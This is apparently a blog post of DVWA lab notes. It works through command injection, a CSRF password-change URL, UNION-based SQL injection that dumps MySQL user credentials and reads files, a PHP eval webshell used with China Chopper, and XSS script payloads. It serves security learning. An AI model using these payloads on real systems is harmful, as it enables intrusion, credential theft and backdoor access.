dvwa实战笔录

一、“Command Execution Vulnerability”-“命令注入漏洞”
127.0.0.1&&net user


二、“Cross Site Request Forgery”-“跨站请求伪造”
在空白的浏览器地址栏中输入以下RUL:
http://192.168.44.130/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change,
输入完成后我们可以看到,窗口提示密码修改成功。这时密码已经修改为:password。
通过电子邮件/聊天软件发送你精心构造的URL,可以直接修改当前用户的配置


三、SQL注入
1、检测漏洞是否存在,可以使用order by语句
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 +--+&Submit=Submit
‘2’为猜想的字段个数


2、确定字段个数
select id=1 ' order by 2
select * from users union select 1,2,3,4,5,6;


3、显示输出位置
union select 1,2 
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2 +--+&Submit=Submit


4、通过这些显示位置来输出我们想要的信息
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,concat_ws(char(32,58,32),user(),database(),version()) +--+&Submit=Submit


5、我们也可能通过显示schemata表,来得到当前数据库中的所有表。
URL: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata +--+&Submit=Submit 


6、 显示数据库当前用户名和密码:concat(user,':',password)from mysql.user 
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union  select  1,concat(user,':',password)from mysql.user+--+&Submit=Submit 


7、  显示某目录下的文件内容:load_file(‘/etc/gdm/failsafeBlacklist’)
URL:http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union  select  1,load_file(‘/etc/gdm/failsafeBlacklist’) +--+&Submit=Submit


8、  上传文件:<?php @eval($_POST['123']);?> into outfile




四、“File Upload”-“文件上传漏洞”
1、上传有以下内容的PHP文件:
<?php @eval($_POST['123']);?>
2、打开“中国菜刀”-添加如下
URL:http://127.0.0.1/dvwa/hackable/uploads/bb(自己上传的木马文件).php
-文件管理,可以直接管理文件系统。




五、XSS攻击
1、“Reflected Cross Site Scripting (XSS)”-“反射型跨站脚本攻击”
<script>alert(/XXX/)</script>
2、“Stored Cross Site Scripting (XSS)”-“存储型跨站脚本攻击”
在提交的文本框中输入“<script>alert(/XXX/)</script>”,提交成功后,以后只要访问该页面就会弹出对话框。


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值